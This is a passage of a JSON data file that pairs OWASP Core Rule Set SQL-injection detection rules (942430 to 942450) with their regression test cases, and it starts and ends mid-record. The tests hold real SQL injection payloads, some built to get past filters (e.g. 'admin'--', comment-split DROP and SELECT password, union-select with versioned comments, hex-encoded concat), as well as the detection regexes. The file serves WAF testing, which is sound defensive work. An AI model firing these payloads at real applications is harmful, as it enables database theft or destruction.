Character Anomaly Detection (args): # of special characters exceeded (12)", "test_id": 1, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=(((((())))))&var2=whatever" }, "expected": { "should_block": true, "rule_ids": [ 942430 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=(((((())))))&var2=whatever" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 1299, "variables": [ { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "((?:[~!@#\\$%\\^&\\*\\(\\)\\-\\+=\\{\\}\\[\\]\\|:;\\\"'´’‘`<>][^~!@#\\$%\\^&\\*\\(\\)\\-\\+=\\{\\}\\[\\]\\|:;\\\"'´’‘`<>]*?){12})", "actions": [ { "act_name": "id", "lineno": 1300, "act_quote": "no_quote", "act_arg": "942430", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 1301, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 1302, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 1303, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1304, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1304, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 1305, "act_quote": "quotes", "act_arg": "Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 1306, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.1} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1307, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1308, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1309, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1310, "act_quote": "quotes", "act_arg": "attack-sqli", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1311, "act_quote": "quotes", "act_arg": "paranoia-level/2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1312, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1313, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1314, "act_quote": "quotes", "act_arg": "capec/1000/152/248/66", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 1315, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 1316, "act_quote": "quotes", "act_arg": "WARNING", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1317, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl2=+%{tx.warning_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1318, "act_quote": "quotes", "act_arg": "tx.sql_injection_score=+%{tx.warning_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 1299 } }, { "rule_id": "942441", "has_tests": false, "detection": { "variables": [ { "name": "ARGS_GET", "part": "fbclid", "negated": false } ], "operator": { "type": "@rx", "argument": "[a-zA-Z0-9_-]{61,61}", "negated": false } }, "transformations": [ "none" ], "metadata": { "phase": "2", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS", "OWASP_CRS/ATTACK-SQLI" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 1325, "variables": [ { "variable": "ARGS_GET", "variable_part": "fbclid", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "[a-zA-Z0-9_-]{61,61}", "actions": [ { "act_name": "id", "lineno": 1326, "act_quote": "no_quote", "act_arg": "942441", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 1327, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 1328, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1329, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 1330, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1331, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1332, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ctl", "lineno": 1333, "act_quote": "no_quote", "act_arg": "ruleRemoveTargetById", "act_arg_val": "942440", "act_arg_val_param": "ARGS", "act_arg_val_param_val": "fbclid" }, { "act_name": "ver", "lineno": 1334, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 1325 } }, { "rule_id": "942442", "has_tests": false, "detection": { "variables": [ { "name": "ARGS_GET", "part": "gclid", "negated": false } ], "operator": { "type": "@rx", "argument": "[a-zA-Z0-9_-]{91,91}", "negated": false } }, "transformations": [ "none" ], "metadata": { "phase": "2", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS", "OWASP_CRS/ATTACK-SQLI" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 1341, "variables": [ { "variable": "ARGS_GET", "variable_part": "gclid", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "[a-zA-Z0-9_-]{91,91}", "actions": [ { "act_name": "id", "lineno": 1342, "act_quote": "no_quote", "act_arg": "942442", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 1343, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 1344, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1345, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 1346, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1347, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1348, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ctl", "lineno": 1349, "act_quote": "no_quote", "act_arg": "ruleRemoveTargetById", "act_arg_val": "942440", "act_arg_val_param": "ARGS", "act_arg_val_param_val": "gclid" }, { "act_name": "ver", "lineno": 1350, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 1341 } }, { "rule_id": "942440", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES", "part": "/_pk_ref/", "negated": true }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "/\\*!?|\\*/|[';]--|--(?:[\\s\\x0b]|[^\\-]*?-)|[^&\\-]#.*?[\\s\\x0b]|;?\\x00", "negated": false } }, "transformations": [ "none", "urlDecodeUni" ], "metadata": { "phase": "2", "message": "SQL Comment Sequence Detected", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-sqli" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-sqli", "paranoia-level/2", "OWASP_CRS", "OWASP_CRS/ATTACK-SQLI", "capec/1000/152/248/66" ] }, "test_cases": [ { "description": "SQL Comment Sequence", "test_id": 1, "request": { "method": "GET", "uri": "/get?var=DROP%20sampletable%3b--", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942440 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "var=DROP%20sampletable%3b--" } ] }, { "description": "SQL Comment Sequence", "test_id": 2, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "test=' or 1=1;%00" }, "expected": { "should_block": true, "rule_ids": [ 942440 ] }, "malicious_patterns": [ { "location": "post_body", "value": "test=' or 1=1;%00" } ] }, { "description": "SQL Comment Sequence", "test_id": 3, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "test=OR 1# " }, "expected": { "should_block": true, "rule_ids": [ 942440 ] }, "malicious_patterns": [ { "location": "post_body", "value": "test=OR 1# " } ] }, { "description": "SQL Comment Sequence", "test_id": 4, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "test=admin'--" }, "expected": { "should_block": true, "rule_ids": [ 942440 ] }, "malicious_patterns": [ { "location": "post_body", "value": "test=admin'--" } ] }, { "description": "SQL Comment Sequence", "test_id": 5, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "test=DROP/*comment*/sampletable" }, "expected": { "should_block": true, "rule_ids": [ 942440 ] }, "malicious_patterns": [ { "location": "post_body", "value": "test=DROP/*comment*/sampletable" } ] }, { "description": "SQL Comment Sequence", "test_id": 6, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "test=DR/**/OP/*bypass deny listing*/sampletable" }, "expected": { "should_block": true, "rule_ids": [ 942440 ] }, "malicious_patterns": [ { "location": "post_body", "value": "test=DR/**/OP/*bypass deny listing*/sampletable" } ] }, { "description": "SQL Comment Sequence", "test_id": 7, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "test=SELECT/*avoid-spaces*/password/**/FROM/**/Members" }, "expected": { "should_block": true, "rule_ids": [ 942440 ] }, "malicious_patterns": [ { "location": "post_body", "value": "test=SELECT/*avoid-spaces*/password/**/FROM/**/Members" } ] }, { "description": "SQL Comment Sequence", "test_id": 8, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "test=SELECT /*!32302 1/0, */ 1 FROM tablename" }, "expected": { "should_block": true, "rule_ids": [ 942440 ] }, "malicious_patterns": [ { "location": "post_body", "value": "test=SELECT /*!32302 1/0, */ 1 FROM tablename" } ] }, { "description": "SQL Comment Sequence", "test_id": 9, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "test=' or 1=1# " }, "expected": { "should_block": true, "rule_ids": [ 942440 ] }, "malicious_patterns": [ { "location": "post_body", "value": "test=' or 1=1# " } ] }, { "description": "SQL Comment Sequence", "test_id": 10, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "test=‘ or 1=1-- -" }, "expected": { "should_block": true, "rule_ids": [ 942440 ] }, "malicious_patterns": [ { "location": "post_body", "value": "test=‘ or 1=1-- -" } ] }, { "description": "SQL Comment Sequence", "test_id": 11, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "test=‘ or 1=1/*" }, "expected": { "should_block": true, "rule_ids": [ 942440 ] }, "malicious_patterns": [ { "location": "post_body", "value": "test=‘ or 1=1/*" } ] }, { "description": "SQL Comment Sequence", "test_id": 12, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "test=1='1' or-- -" }, "expected": { "should_block": true, "rule_ids": [ 942440 ] }, "malicious_patterns": [ { "location": "post_body", "value": "test=1='1' or-- -" } ] }, { "description": "SQL Comment Sequence", "test_id": 13, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "test=' /*!50000or*/1='1" }, "expected": { "should_block": true, "rule_ids": [ 942440 ] }, "malicious_patterns": [ { "location": "post_body", "value": "test=' /*!50000or*/1='1" } ] }, { "description": "SQL Comment Sequence", "test_id": 14, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "test=' /*!or*/1='1" }, "expected": { "should_block": true, "rule_ids": [ 942440 ] }, "malicious_patterns": [ { "location": "post_body", "value": "test=' /*!or*/1='1" } ] }, { "description": "SQL Comment Sequence", "test_id": 15, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "test=0/**/union/*!50000select*/table_name`foo`/**/" }, "expected": { "should_block": true, "rule_ids": [ 942440 ] }, "malicious_patterns": [ { "location": "post_body", "value": "test=0/**/union/*!50000select*/table_name`foo`/**/" } ] }, { "description": "Avoid False Positive on JWT (body)", "test_id": 16, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent" }, "data": "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMe--KKF2QT4fwpMeJf36POk6yJV_adQssw-5c" }, "expected": { "should_block": false, "rule_ids": [ 942440 ] }, "malicious_patterns": [ { "location": "post_body", "value": "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMe--KKF2QT4fwpMeJf36POk6yJV_adQssw-5c" } ] }, { "description": "Avoid False Positive on JWT (cookie)", "test_id": 17, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Cookie": "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMe--KKF2QT4fwpMeJf36POk6yJV_adQssw-5c" }, "data": "foo=bar" }, "expected": { "should_block": false, "rule_ids": [ 942440 ] }, "malicious_patterns": [ { "location": "post_body", "value": "foo=bar" } ] }, { "description": "Avoid False Positive on JWT (querystring)", "test_id": 18, "request": { "method": "GET", "uri": "/get/callback?token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMe--KKF2QT4fwpMeJf36POk6yJV_adQssw-5c", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 942440 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMe--KKF2QT4fwpMeJf36POk6yJV_adQssw-5c" } ] }, { "description": "False positive against Facebook click identifier", "test_id": 19, "request": { "method": "GET", "uri": "/get?fbclid=IwAR1dug0BYxe0ukhZ2vKrdQwLAxVFRJ--Q2Y7OBJE_0uId9-Eh-sJWLdVk2E", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 942440 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "fbclid=IwAR1dug0BYxe0ukhZ2vKrdQwLAxVFRJ--Q2Y7OBJE_0uId9-Eh-sJWLdVk2E" } ] }, { "description": "False positive against Google click identifier", "test_id": 20, "request": { "method": "GET", "uri": "/get?gclid=j0KCQiA1NebBhDDARIsAANiDD3_RJeMv8zScF--mC1jf8fO8PDYJCxD9xdwT7iQ59QIIwL-86ncQtMaAh0lEALw_wcB", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 942440 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "gclid=j0KCQiA1NebBhDDARIsAANiDD3_RJeMv8zScF--mC1jf8fO8PDYJCxD9xdwT7iQ59QIIwL-86ncQtMaAh0lEALw_wcB" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 1388, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES", "variable_part": "/_pk_ref/", "quote_type": "no_quote", "negated": true, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "/\\*!?|\\*/|[';]--|--(?:[\\s\\x0b]|[^\\-]*?-)|[^&\\-]#.*?[\\s\\x0b]|;?\\x00", "actions": [ { "act_name": "id", "lineno": 1389, "act_quote": "no_quote", "act_arg": "942440", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 1390, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 1391, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 1392, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1393, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1393, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 1394, "act_quote": "quotes", "act_arg": "SQL Comment Sequence Detected", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 1395, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1396, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1397, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1398, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1399, "act_quote": "quotes", "act_arg": "attack-sqli", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1400, "act_quote": "quotes", "act_arg": "paranoia-level/2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1401, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1402, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1403, "act_quote": "quotes", "act_arg": "capec/1000/152/248/66", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 1404, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 1405, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "chain", "lineno": 1406, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": true, "operator_negated": false, "oplineno": 1388 } }, { "rule_id": null, "has_tests": false, "detection": { "variables": [ { "name": "MATCHED_VARS", "part": "", "negated": false } ], "operator": { "type": "@rx", "argument": "^ey[\\-0-9A-Z_a-z]+\\.ey[\\-0-9A-Z_a-z]+\\.[\\-0-9A-Z_a-z]+$", "negated": true } }, "transformations": [ "none" ], "metadata": {}, "attack_info": { "type": [], "severity": null, "tags": [] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 1407, "variables": [ { "variable": "MATCHED_VARS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "^ey[\\-0-9A-Z_a-z]+\\.ey[\\-0-9A-Z_a-z]+\\.[\\-0-9A-Z_a-z]+$", "actions": [ { "act_name": "t", "lineno": 1408, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1409, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1410, "act_quote": "quotes", "act_arg": "tx.sql_injection_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": true, "oplineno": 1407 } }, { "rule_id": "942450", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES", "part": "/_pk_ref/", "negated": true }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "(?i:\\b0x[a-f\\d]{3,})", "negated": false } }, "transformations": [ "none", "urlDecodeUni" ], "metadata": { "phase": "2", "message": "SQL Hex Encoding Identified", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-sqli" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-sqli", "paranoia-level/2", "OWASP_CRS", "OWASP_CRS/ATTACK-SQLI", "capec/1000/152/248/66" ] }, "test_cases": [ { "description": "SQL Hex Encoding", "test_id": 1, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=%5c0xf00dsdfdsa" }, "expected": { "should_block": true, "rule_ids": [ 942450 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=%5c0xf00dsdfdsa" } ] }, { "description": "SQL Hex Encoding", "test_id": 2, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=concat%280x223e3c62723e%2Cversion%28%29%2C0x3c696d67207372633d22%29" }, "expected": { "should_block": true, "rule_ids": [ 942450 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=concat%280x223e3c62723e%2Cversion%28%29%2C0x3c696d67207372633d22%29" } ] }, { "description": "SQL Hex Encoding", "test_id": 3, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=select%200x616263" }, "expected": { "should_block": true, "rule_ids": [ 942450 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=select%200x616263" } ] }, { "description": "SQL Hex Encoding - negative", "test_id": 4, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=IHRlc3Q0xAcF" }, "expected": { "should_block": false, "rule_ids": [ 942450 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=IHRlc3Q0xAcF" } ] }, { "description": "SQL Hex Encoding - negative", "test_id": 5, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": 